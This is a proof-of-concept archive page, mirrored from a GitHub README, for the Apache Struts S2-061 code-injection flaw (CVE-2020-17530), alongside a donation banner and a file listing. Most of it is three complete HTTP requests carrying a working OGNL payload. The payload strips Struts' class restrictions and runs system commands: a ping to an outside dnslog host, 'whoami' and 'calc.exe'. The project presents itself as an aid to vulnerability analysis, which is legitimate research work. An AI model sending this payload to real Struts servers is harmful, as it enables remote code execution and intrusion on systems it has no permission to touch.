支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: be3a666dc8d8c3b5350ebfb83ddb395d9a3fb7fc

来源
https://github.com/Al1ex/CVE-2020-17530
关联漏洞
标题:Apache Struts 代码注入漏洞 (CVE-2020-17530)
Description:Apache Struts是美国阿帕奇(Apache)基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 Struts 存在代码注入漏洞,攻击者可利用该漏洞可以通过强迫Struts的OGNL评估来使用漏洞来运行代码。
Description
S2-061 CVE-2020-17530
介绍
## What's this
This is a Simple test Project for S2-061 which can be used to analysis the detail of this vulnerability.

## How to use 

Step 1:Use IDEA  import this project

Step 2:setup tomcat Server

Step 3:Use browser access "http://192.168.174.149:8080/SimpleStruts_war_exploded/S2061.action?id=%25%7b8%2a8%7d"

![simpletst](image/simpletst.png)

### How to Exploit

##### SSRF Test

~~~
POST /SimpleStruts_war_exploded/S2061.action HTTP/1.1
Host: 192.168.174.149:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=0DD7F8E6B11D062C574037318DC36C2D
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 846

------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"

%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("ping 4ofoqe.dnslog.cn")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--
~~~

![SSRF](image/SSRF.png)

DNSLog:

![DNSLog](image/DNSLog.png)

##### System command

~~~
POST /SimpleStruts_war_exploded/S2061.action HTTP/1.1
Host: 192.168.174.149:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=0DD7F8E6B11D062C574037318DC36C2D
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 831

------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"

%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("whoami")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--
~~~

![system_command](image/system_command.png)

##### execute calc

~~~
POST /SimpleStruts_war_exploded/S2061.action HTTP/1.1
Host: 192.168.174.149:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=0DD7F8E6B11D062C574037318DC36C2D
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 833

------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"

%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("calc.exe")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--
~~~

![calc_1](image/calc_1.png)

result:![calc_2](image/calc_2.jpg)
文件快照

 [4.0K]  /data/pocs/be3a666dc8d8c3b5350ebfb83ddb395d9a3fb7fc
├── [4.0K]  CVE-2020-17530
│   ├── [2.5K]  pom.xml
│   ├── [ 360]  SimpleStruts.iml
│   └── [4.0K]  src
│       └── [4.0K]  main
│           ├── [4.0K]  java
│           │   └── [4.0K]  org
│           │       └── [4.0K]  heptagram
│           │           └── [4.0K]  action
│           │               └── [ 343]  IndexAction.java
│           ├── [4.0K]  resources
│           │   └── [ 550]  struts.xml
│           └── [4.0K]  webapp
│               ├── [  91]  index.jsp
│               ├── [ 270]  S2061.jsp
│               └── [4.0K]  WEB-INF
│                   └── [ 501]  web.xml
├── [4.0K]  image
│   ├── [ 70K]  calc_1.png
│   ├── [284K]  calc_2.jpg
│   ├── [ 28K]  DNSLog.png
│   ├── [ 46K]  simpletst.png
│   ├── [ 94K]  SSRF.png
│   └── [ 71K]  system_command.png
└── [4.4K]  README.md

11 directories, 14 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。